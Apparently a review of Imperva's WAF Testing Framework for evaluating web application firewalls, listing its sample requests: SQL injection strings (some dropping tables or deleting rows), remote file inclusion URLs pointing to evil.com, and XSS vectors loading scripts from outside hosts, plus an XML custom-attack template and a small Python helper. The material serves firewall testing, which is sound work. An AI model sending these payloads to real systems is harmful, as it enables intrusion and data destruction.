WAF Testing Framework is developed by Imperva employees (Yaniv Azaria, Amichai Shulman) and was presented at OWASP AppSec USA in 2012.
To work properly it requires:
- Windows OS
- Java 1.6
- WebGoat application
Deployment
The WebGoat application is provided with the tool, or you can use one from other sources (e.g. OWASPbwa). The deployment process looks easy: install Java and run the compiled exe file. You still need at least one Windows VM to run the tool, though.
The network scheme looks like this:
Tests
If the first attack is blocked, the tool stops sending similar requests, so to get the whole list of attacks I sent them to an unprotected application. The list of all possible requests is below; it includes 5 HTTP Parameter Pollution, 33 Remote File Inclusion, 17 Cross-Site Scripting and 10 SQL Injection samples.
Besides that, the tool sends 234 legitimate requests that are supposed to cause false positives, like:
message=We dropped a million Deutschemark to get the schematic (and it was not worth it)
message=this is not good; drop the item you are holding!&SUBMIT=Submit
message=select one item from these funny things =)
HTTP Parameter Pollution
message=' or '&message=' <> 'x'
message=' or '&message=' <> 'xxx'
message=' or '&message=' <> 'xyz'
message=' or '&message=' = ','
message=' union/*&message=*/select number from credit_card
Remote File Inclusion
bidirect=http://www.acbdef.com/index.html
isDirect=http://www.acbdef.com/index.html
p_direction=http://www.acbdef.com/index.html
p_redirect_uri=http://www.acbdef.com/index.html
redirect=http://www.acbdef.com/index.html
redirect_uri=http://www.acbdef.com/index.html
redirecturl=http://www.acbdef.com/index.html
strRedirect=http://www.acbdef.com/index.html
document_root=http://www.evil.com/getdata.php
spaw_root=http://www.evil.com/getdata.php
CONF_INCLUDE_PATH=http://www.evil.com/getdata.php
page=http://www.evil.com/getdata.php
libpath=http://www.evil.com/getdata.php
base_path=http://www.evil.com/getdata.php
art=http://www.evil.com/getdata.php
dir=http://www.evil.com/getdata.php
url=http://www.evil.com/getdata.php
path_om=http://www.evil.com/getdata.php
include_path=http://www.evil.com/getdata.php
lang=http://www.evil.com/getdata.php
lng=http://www.evil.com/getdata.php
path_faqe=http://www.evil.com/getdata.php
lang=http://www.evil.com/getdata.php
root=http://www.evil.com/getdata.php
art=http://www.evil.com/getdata.php
lang=http://www.evil.com/getdata.php
path_om=http://www.evil.com/getdata.php
PathToRoot=http://www.evil.com/getdata.php
libpath=http://www.evil.com/getdata.php
goto=http://www.evil.com/getdata.php
goto=http://www.evil.com/getdata.php
template=http://www.evil.com/getdata.php
menu=http://www.evil.com/getdata.php
SQL Injection
message=' or 'a' = (select 'a')
message=' or 12345678 or 1=1
message= a' or 1 = (select 1 from dual)
message=a'; delete from customers where id = 12
message=a'; drop function login
message=a'; drop table users
message=a' or (case when 'a' then 1 else 0 end) = 0;
message=a' or (false) = 'c'
message=a' or (select 1) = 1
message=a' or -+!1= -+!1
Cross-Site Scripting (XSS)
message=<BODY ONLOAD=alert('XSS')>
message=<IMG DYNSRC="javascript:alert('XSS')">
message=<IMG SRC="  javascript:alert('XSS');">
message=<IMG SRC="jav
ascript:alert('XSS');">
message=<IMG SRC="javascript:alert('XSS');">
message=<IMG SRC=javascript:alert('XSS')>
message=<IMG SRC=javascript:alert('XSS')>
message=<IMG SRC=javascript:alert('XSS')>
message=<IMG SRC=`javascript:alert("xxxx, 'XSS'")`>
message=<IMG SRC=javascript:alert("XSS")>
message=<IMG SRC=javascript:alert('XSS')>
message=<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
message=<SCRIPT/SRC="http://www.evil.com/xss.js"></SCRIPT>
message=<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
message=<SCRIPT>a=/XSS/ alert(a.source)</SCRIPT>
message=<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
message=<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
Custom attacks
The framework provides the ability to add additional requests in XML format. The template looks like this:
<?xml version="1.0" encoding="UTF-8"?>
<http-recording>
  <sequence repeat="1">
    <request method="POST" protocol="http" protocol-version="HTTP/1.1" path="/sendmsg.jsp">
      <headers>
        <header name="Accept"><![CDATA[application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*]]></header>
        <header name="Accept-Language"><![CDATA[en-US]]></header>
        <header name="Content-Type"><![CDATA[application/x-www-form-urlencoded]]></header>
        <header name="Pragma"><![CDATA[no-cache]]></header>
      </headers>
      <body><![CDATA[subj=&text='+or+1=1+--+1&Username=Anonymous&x=32&y=7]]></body>
      <comment>Simple SQL Injection</comment>
    </request>
  </sequence>
</http-recording>
In request the following attributes should be set:
- method: POST
- protocol: http
- protocol-version: HTTP/1.1
- path, including GET arguments: sendmsg.jsp
Add headers to the request, like Accept, Accept-Language, Content-Type and Pragma.
Then add the request body and a comment that will be included in the report.
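As an added example (not code from the post or from the WAF Testing Framework itself), the following builds a recording in the format described above from a list of form-field cases and parses such a file back into plain request records, refusing a request that lacks one of the required attributes. The sample case, the header set (only Content-Type) and the function names are assumptions made here.

```python
from urllib.parse import urlencode
from xml.sax.saxutils import escape
import xml.etree.ElementTree as ET

# Attributes the page says every <request> element must carry.
REQUIRED_ATTRS = ("method", "protocol", "protocol-version", "path")


def _cdata(text):
    """Wrap text in a CDATA section, as the recording format does for values."""
    if "]]>" in text:
        raise ValueError("CDATA terminator inside content")
    return "<![CDATA[%s]]>" % text


def build_recording(cases, path="/sendmsg.jsp", repeat=1):
    """cases: iterable of (form_fields dict, comment); fields become a POST body."""
    out = ['<?xml version="1.0" encoding="UTF-8"?>', "<http-recording>",
           '<sequence repeat="%d">' % repeat]
    for fields, comment in cases:
        out += ['<request method="POST" protocol="http" '
                'protocol-version="HTTP/1.1" path="%s">' % escape(path, {'"': "&quot;"}),
                "<headers>",
                '<header name="Content-Type">%s</header>'
                % _cdata("application/x-www-form-urlencoded"),
                "</headers>",
                "<body>%s</body>" % _cdata(urlencode(fields)),
                "<comment>%s</comment>" % escape(comment),
                "</request>"]
    out += ["</sequence>", "</http-recording>"]
    return "\n".join(out)


def parse_recording(xml_text):
    """Return one dict per <request>; reject a hand-written file missing attributes."""
    records = []
    for req in ET.fromstring(xml_text).iter("request"):
        missing = [a for a in REQUIRED_ATTRS if a not in req.attrib]
        if missing:
            raise ValueError("request is missing attributes: %s" % missing)
        records.append({
            "method": req.get("method"), "path": req.get("path"),
            "headers": {h.get("name"): h.text for h in req.iter("header")},
            "body": req.findtext("body") or "",
            "comment": req.findtext("comment") or "",
        })
    return records


# Constructed sample: one of the page's legitimate (false-positive bait) messages.
SAMPLE_CASES = [({"message": "select one item from these funny things =)",
                  "SUBMIT": "Submit"}, "Legitimate request, must not be blocked")]
```

Running `parse_recording(build_recording(SAMPLE_CASES))` gives the URL-encoded body and comment back, which is a quick way to review a custom recording before handing it to the tool.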
Summary
Report Example
Pros
- Easy to deploy if you have a ready-to-use Windows environment
- The framework allows adding custom attack samples in XML format
- The report looks nice
Cons
- Low number of attacks
- Attack samples are hard-coded somewhere inside the compiled package
- Requires a Windows platform to run the tool
- No CSRF token support: if the WAF adds CSRF token protection, all POST requests will be blocked
- Works adequately only with the bundled custom WebGoat application